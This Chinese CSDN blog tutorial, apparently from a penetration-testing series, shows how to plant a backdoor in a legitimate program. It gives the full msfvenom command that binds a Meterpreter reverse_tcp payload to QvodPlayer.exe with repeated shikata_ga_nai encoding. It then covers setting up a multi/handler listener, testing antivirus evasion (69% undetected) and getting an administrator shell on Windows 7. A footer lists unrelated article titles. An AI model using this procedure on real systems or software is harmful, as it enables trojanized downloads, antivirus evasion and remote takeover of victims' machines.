今天继续给大家介绍渗透测试相关知识,本文主要内容是MSF给正常程序添加后门。

免责声明:
本文所介绍的内容仅做学习交流使用,严禁利用文中技术进行非法行为,否则造成一切严重后果自负!
再次强调:严禁对未授权设备进行渗透测试!

一、后门制作

在上文MSF制作Windows客户端恶意软件获取SHELL过程中,我们进行了使用MSF创造一个后门文件的实战。今天,我们来学习以下如何给一个已经存在程序添加后门程序。
我们今天还是准备使用Kali Linux设备对Windows7设备进行渗透测试,由于在实践中,给一个单独的软件添加后门程序总是会导致程序无法运行,因此我们尝试找到一个符合类型的软件,即该软件由多个exe可执行文件组成,主程序执行后会调用其他程序,我们给非主程序的程序添加后门。
在Kali Linux上,执行命令:

msfvenom -a x86 --platform windows -p windows/meterpreter/reverse_tcp LHOST=192.168.136.199 LPORT=4444 -b "\x00" -e x86/shikata_ga_nai -i 10 -x /root/QvodPlayer.exe -f exe -o /var/www/html/exp.exe

即可给QvodPlayer.exe可执行文件添加后门程序,该命令执行结果如下所示:

在以上的命令中,大部分参数都已经在MSF制作Windows客户端恶意软件获取SHELL过程讲过,这里就不过多赘述了。唯一需要提到的是-x参数,该参数指定了要给哪个可执行文件添加后门程序。

二、监听开启

在完成后门程序的添加后,我们还需要在Kali Linux系统上进行监听。执行命令:

use exploit/multi/handler

使用该模块,并设置LHOST参数,使之如下所示:

之后,我们执行该模块,即可开启监听了。

三、效果检验

最后,我们对刚才生成的后门程序进行检测。

(一)软件查杀测评

首先,我们还是访问https://www.virscan.org/,对含有我们后门程序的软件进行测评,结果如下所示:


从上图中可以看出,我们的后门程序免杀率为69%。

(二)软件效果检验

我们在Windows7系统上运行该程序,在kali Linux系统上就可以看到Windows 7系统反馈的SHELL,如下所示:

从上图可以看出,我们成功获取到Windows7系统的管理员权限。
原创不易,转载请说明出处:https://blog.csdn.net/weixin_40228200

MSF给正常程序添加后门相关推荐

  1. linux下 为自己编写的程序 添加tab自动补全 功能

    linux下 为自己编写的程序 添加tab自动补全功能 入门 complete 在我的tmp下随便写了一个a.sh, 为他补全 edit /etc/bash_completion.d/foo _foo ...

  2. firebase 推送_如何使用Firebase向Web应用程序添加推送通知?

    firebase 推送 by Leonardo Cardoso 由莱昂纳多·卡多佐(Leonardo Cardoso) 如何使用Firebase向Web应用程序添加推送通知? (How to add ...

  3. 为.NET部署应用程序添加个卸载程序

    地球人都知道.NET自带的部署程序用起来很方便很简单,但.NET部署程序是没有卸载文件. 下面的方法可以很简单的为你的程序添加1个卸载文件,.NET是利用windows Installer来部署程序的 ...

  4. 关于把程序添加到打开方式的解决办法

    对于如果想用其他某个程序打开某种文件,找到程序在点击确定之后,回到打开方式对话框中,里面没有你刚才选择的程序,无法将你要的程序添加到打开方式里面,只能自己单独×××该程序,在程序里面再打开你要用的文件 ...

  5. 给你的Flex程序添加深链接和分析-其实比你想象的要简单

    Adobe Flash Builder 4 简体中文正式版 Windows版点击下载:http://g.csdn.net/5134151 Adobe Flash Builder 4 简体中文正式版 M ...

  6. 【OpenGL】二十四、OpenGL 纹理贴图 ( 读取文件内容 | 桌面程序添加控制台窗口 | ‘fopen‘: This function may be unsafe 错误处理 )

    文章目录 一.文件读取 二.报错处理 ( 'fopen': This function or variable may be unsafe. ) 三.桌面程序添加控制台窗口 四.相关资源 一.文件读取 ...

  7. 为ios 应用程序添加图标和添加名字

    为应用程序添加图标方法: 1.找到ios工程文件对应的 ***.plist文件.查看是否有 iconfile 或者iconfiles 键值,如果有,请看下一步.如果没有,则随便选中一个键值,然后点击 ...

  8. qt修改程序图标名称_解决Qt应用程序添加icon图标,修改窗口图标以及添加系统托盘问题...

    一.Qt应用程序添加icon图标的方法: 首先,我们需要先准备两个文件,一个是icon图标,另一个是rc文件,我分别命名为"myApp.rc"和"soft.ico&quo ...

  9. 微信小程序——添加按钮格式

    微信小程序--添加按钮 步骤一:在wxml文件中添加按钮代码(图后提供可复制代码) <button class = "button_cat">炸炸呼呼</butt ...

  10. wxWidgets:编写一个应用程序 - 添加一个按钮

    wxWidgets:编写一个应用程序 - 添加一个按钮 wxWidgets:编写一个应用程序 - 添加一个按钮 wxWidgets:编写一个应用程序 - 添加一个按钮 感谢您阅读本教程至少到此为止.在 ...

最新文章

  1. 2017高级软件工程第1次作业
  2. div置于页面底部_浏览器渲染页面的原理及流程
  3. asp.net mvc 使用bootstrap的模态框插件modal
  4. 找出1-100中缺失的两个数
  5. Oracle入门(十四.9)之迭代控制:WHILE和FOR循环
  6. CSS之两栏固定布局(二)
  7. ElasticSearch 并发的处理方式:锁和版本控制_07
  8. 360天气怎么设置方法 360天气如何设置城市
  9. postgresql 的 .pgpass密码文件的使用
  10. 离你最近的疫情小区,终于可以自己查了!
  11. 硬币找零,最长上升子序列,背包问题等动态规划问题详解
  12. junper srx配置思路
  13. QCSPCChart SPC for JS
  14. 用css制作网站首页
  15. 需求与商业模式创新-4-战略
  16. python爬取百度首页源代码并存储到HTML文件里
  17. 电脑连不上5GWiFi解决办法:更新驱动
  18. 24小时制和12小时制am Matlab,十二钟头制与二十四小时制详解
  19. php cache_expire,PHP session_cache_expire 会话函数
  20. web一阶段 day27

热门文章

  1. Learn Git Branching 学习笔记(高级篇)
  2. Learn Git Branching 学习笔记(Git 技术、技巧与贴士集合篇)
  3. 修改360抢票的刷新频率+突破8车次限制
  4. 计算机安装xp蓝屏怎么办,重装xp系统一直蓝屏重启循环怎么回事
  5. 《大型网站技术架构-核心原理与案例分析》(李智慧 著)第3章-大型网站核心架构要素
  6. Processing创意编程(进阶篇)
  7. 一对一直播app源码开发的前端实现
  8. 解密灰鸽子木马帝国【实在是恐怖呀】
  9. 敏捷史话(三):笃定前行的勇者——Ken Schwaber
  10. 怎样写Robots文件?